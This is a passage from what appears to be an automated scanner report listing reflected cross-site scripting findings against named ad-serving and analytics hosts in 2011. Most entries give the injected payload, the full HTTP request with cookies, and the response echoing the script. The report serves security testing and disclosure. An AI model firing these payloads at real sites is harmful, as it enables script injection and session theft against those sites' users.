<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id= ...[SNIP]... ype = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&dbeb5"-alert(1)-"cefe6b77701=1&s=1678185&_salt=3597926079";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if( ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48655'%3balert(1)//ba986b9e810 was submitted in the h parameter. This input was echoed as 48655';alert(1)//ba986b9e810 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=C8EFE2E&w=728&h=9048655'%3balert(1)//ba986b9e810 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 381 Date: Thu, 03 Feb 2011 16:08:06 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E&rand=" + myRand;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9352f"%3balert(1)//887397266bd was submitted in the pid parameter. This input was echoed as 9352f";alert(1)//887397266bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=C8EFE2E9352f"%3balert(1)//887397266bd&w=728&h=90 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 381 Date: Thu, 03 Feb 2011 16:07:49 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E9352f";alert(1)//887397266bd&rand=" + myRand;
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d76ed'%3balert(1)//7fc95e77677 was submitted in the w parameter. This input was echoed as d76ed';alert(1)//7fc95e77677 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=C8EFE2E&w=728d76ed'%3balert(1)//7fc95e77677&h=90 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 381 Date: Thu, 03 Feb 2011 16:07:54 GMT
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E&rand=" + myRand;
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9934'-alert(1)-'9b44b809a0d was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/v=5;m=2;l=10980;cxt=99061898:2148402-10000150:2148402;kw=;ts=62446;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0e9934'-alert(1)-'9b44b809a0d HTTP/1.1 Host: ads.specificmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/300x250/accuweather_btf?t=1296754789156&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5035.928757113086138685
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:37 GMT Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0 Set-cookie: smu=5066.928757113086138685; domain=.specificmedia.com; path=/; expires=Fri, 08-Jan-2016 18:53:37 GMT P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV" Content-Length: 370 Expires: Wed, 02 Feb 2011 18:53:37 GMT Cache-Control: no-cache,must-revalidate Pragma: no-cache Connection: close Content-Type: application/x-javascript
1.63. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.specificmedia.com
Path:
/serve/v=5
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15f9d'-alert(1)-'2c3bcbaf79d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/v=5;m=2;l=10980;cxt=99061898:2148402-10000150:2148402;kw=;ts=62446;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0&15f9d'-alert(1)-'2c3bcbaf79d=1 HTTP/1.1 Host: ads.specificmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/300x250/accuweather_btf?t=1296754789156&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5035.928757113086138685
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:38 GMT Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0 Set-cookie: smu=5066.928757113086138685; domain=.specificmedia.com; path=/; expires=Fri, 08-Jan-2016 18:53:38 GMT P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV" Content-Length: 373 Expires: Wed, 02 Feb 2011 18:53:38 GMT Cache-Control: no-cache,must-revalidate Pragma: no-cache Connection: close Content-Type: application/x-javascript
1.64. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserving.cpxinteractive.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa4b7"-alert(1)-"af13f1e484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=pop&ad_size=0x0§ion=1421534&banned_pop_types=28&pop_times=1&pop_frequency=86400&fa4b7"-alert(1)-"af13f1e484=1 HTTP/1.1 Host: adserving.cpxinteractive.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:03:28 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Thu, 03 Feb 2011 16:03:28 GMT Pragma: no-cache Content-Length: 4400 Age: 0 Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 86400; rm_pop_times = 1; rm_pop_id = 1421534; rm_tag_type = "pop"; rm_url = "http://adserving.cpxinteractive.com/imp?Z=0x0&y=28&fa4b7"-alert(1)-"af13f1e484=1&s=1421534&_salt=3329141379";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if( ...[SNIP]...
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload d1d97<img%20src%3da%20onerror%3dalert(1)>37234bbbf48 was submitted in the q parameter. This input was echoed as d1d97<img src=a onerror=alert(1)>37234bbbf48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /qsonhs.aspx?FORM=ASAPIW&q=d1d97<img%20src%3da%20onerror%3dalert(1)>37234bbbf48 HTTP/1.1 Host: api.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com/search?q=online+banking&go=&form=QBLH&qs=n&sk=&sc=8-10 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; _FP=; _HOP=; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM; RMS=F=G; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Content-Length: 79 Content-Type: application/json; charset=utf-8 X-Akamai-TestID: 2284389bc6f9439a8eeedd3f98885c17 Date: Thu, 03 Feb 2011 13:42:59 GMT Connection: close
The value of the template request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d35cb'%3balert(1)//c971cafb721 was submitted in the template parameter. This input was echoed as d35cb';alert(1)//c971cafb721 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /as/InitiateCall2.php?accountid=200106286435&template=655713d35cb'%3balert(1)//c971cafb721&checklinkstatus=1 HTTP/1.1 Host: as00.estara.com Proxy-Connection: keep-alive Referer: http://www201.americanexpress.com/business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0%22%3balert(1)//2536ed24016 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827; fscookies=b64_VcxBDsIwDATA3.QGSozt2Ie8BQWIVA4NiIb-E6Vqa3xbzXrB..AZhPFCKYByRAikLt9aWRoYvX5yfdTvnBjPvYHkt2NxvUin6dmWFBxj3-kPr3epe5hzu09loEY9miNsTRWzMcIuke0PW0EraIWskJVoJR4iYtZGWOUH
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:12:10 GMT Server: Apache P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml" Expires: Wed, 11 Nov 1998 11:11:11 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: application/x-javascript Content-Length: 10152
var wv_available = true; if (typeof(wv_available_vars) == 'undefined') wv_available_vars = new Array(); wv_available_vars['655713d35cb';alert(1)//c971cafb721'] = true;
var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_ac ...[SNIP]...
The value of the urid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46c6"%3balert(1)//6377ce7bc77 was submitted in the urid parameter. This input was echoed as b46c6";alert(1)//6377ce7bc77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /as/commonlink.php?accountid=200106286435&template=253566&urid=69799b46c6"%3balert(1)//6377ce7bc77&estara_fsguid=0DC1EAC72231C3B51F226785010C6827&host=as00.estara.com&fromrules=1&dnc=1296742159.25144911407943 HTTP/1.1 Host: as00.estara.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fscookies=b64_VcxNDsIgEAXg27CrgWF.YMFZDCpJGy0ai-e3IbYdZ-fyvXlgrbMMgdFTchBZEMAGky.tLA2Unt.53upnTownRxHJbsfBrEUaxqktyRvGdec-PF.l7mHO7TqWjlHi0exha8agNnrYRVj-sBbUglpIC2kRLXJICGqth588pnofmEicT-AF; fsserver__SESSION____SECURE__=c-7301.estara.com; fsserver__SESSION__=c-7301.estara.com; fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:59 GMT Server: Apache P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml" Expires: Wed, 11 Nov 1998 11:11:11 GMT Last-Modified: Thu, 03 Feb 2011 14:15:59 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: fscookies=b64_lY9BDoMgEEVPgzsbGGAGFm666DUatSSaKjaK9y.xVafLEjYv7-8fACmVRHBotK0UeCQDIF1RNyksCZi9z3V8xHWs0FyU9cbK-aArctCWXZ.WShdo8s4vTK8QDxjr1HZhk578mdxgT3rHNjY4DCHvIDeGG8ON5cZyQ9zQaZxjaxt8zdDHZ4nWktIVfJ7dGGxRAAh9rYcwJwFOCfACbvmiJmoDNS3R8Xf1Z69ZU5pi7r0B; expires=Tue, 02-Feb-2016 14:15:59 GMT; path=/UI/; domain=.estara.com Connection: close Content-Type: application/x-javascript Content-Length: 34262
The value of the urid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62faa'%3balert(1)//57357bc1d12 was submitted in the urid parameter. This input was echoed as 62faa';alert(1)//57357bc1d12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /as/commonlink.php?accountid=200106286435&template=253566&urid=6979962faa'%3balert(1)//57357bc1d12&estara_fsguid=0DC1EAC72231C3B51F226785010C6827&host=as00.estara.com&fromrules=1&dnc=1296742159.25144911407943 HTTP/1.1 Host: as00.estara.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fscookies=b64_VcxNDsIgEAXg27CrgWF.YMFZDCpJGy0ai-e3IbYdZ-fyvXlgrbMMgdFTchBZEMAGky.tLA2Unt.53upnTownRxHJbsfBrEUaxqktyRvGdec-PF.l7mHO7TqWjlHi0exha8agNnrYRVj-sBbUglpIC2kRLXJICGqth588pnofmEicT-AF; fsserver__SESSION____SECURE__=c-7301.estara.com; fsserver__SESSION__=c-7301.estara.com; fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:59 GMT Server: Apache P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml" Expires: Wed, 11 Nov 1998 11:11:11 GMT Last-Modified: Thu, 03 Feb 2011 14:15:59 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: fscookies=b64_lY9BDsIgEEVPQ3caGJgZWLBx4TUMVYyNLTUV729TtY5LCZuX9-8PgNZGE3hyFqOBQOwAtG9SW-O9grCHKZVTeQyR3NZgcKg-h3wzB3Fz6eo92obcvPML4y2XFYZUj5e8yMDhm1zgkwxebCywGibZIWmcNE4alAalYWn4a7wXawu8Td.V64YQ2dgIr2cTnFNSwMruUp.nqsAbBUHBfr7IFrk9mpOB9e-mz177qHUsc.8J; expires=Tue, 02-Feb-2016 14:15:59 GMT; path=/UI/; domain=.estara.com Connection: close Content-Type: application/x-javascript Content-Length: 34262
var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_accountid"]=" ...[SNIP]... =500;wv_vars["ui_height"]=500;wv_start(wv_argscopy);wv_vars["ui_width"]=prev_ui_width;wv_vars["ui_height"]=prev_ui_height;}setTimeout('eStaraCookieDictionaryDelete(\'estaracookie\', \'rule_action_6979962faa';alert(1)//57357bc1d12\', true, null);', 1000);var wv_available = true; if (typeof(wv_available_vars) == 'undefined') wv_available_vars = new Array(); wv_available_vars['253566'] = true; if (typeof(wv_vars)=="undefined") ...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload f8470<script>alert(1)</script>d3eebd4205c was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2f8470<script>alert(1)</script>d3eebd4205c&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:20 GMT Date: Thu, 03 Feb 2011 16:08:20 GMT Connection: close Content-Length: 3587
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 961a2<script>alert(1)</script>f667e8d66a2 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=9319&c5=&c6=&c10=3209360961a2<script>alert(1)</script>f667e8d66a2&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;c1=uncategorized;ord=3300234652124345.5? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 18:53:46 GMT Date: Thu, 03 Feb 2011 18:53:46 GMT Connection: close Content-Length: 3593
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 78a58<script>alert(1)</script>157d4440e69 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=&c6=&c15=78a58<script>alert(1)</script>157d4440e69 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:24 GMT Date: Thu, 03 Feb 2011 16:08:24 GMT Connection: close Content-Length: 3587
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 45f85<script>alert(1)</script>5d73e5872e0 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=603578645f85<script>alert(1)</script>5d73e5872e0&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:20 GMT Date: Thu, 03 Feb 2011 16:08:20 GMT Connection: close Content-Length: 3587
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c039a<script>alert(1)</script>445d1c22264 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786c039a<script>alert(1)</script>445d1c22264&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:21 GMT Date: Thu, 03 Feb 2011 16:08:21 GMT Connection: close Content-Length: 3587
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 257a9<script>alert(1)</script>4757a91e5f0 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=257a9<script>alert(1)</script>4757a91e5f0&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:22 GMT Date: Thu, 03 Feb 2011 16:08:22 GMT Connection: close Content-Length: 3587
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1f462<script>alert(1)</script>398a6a54a7c was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
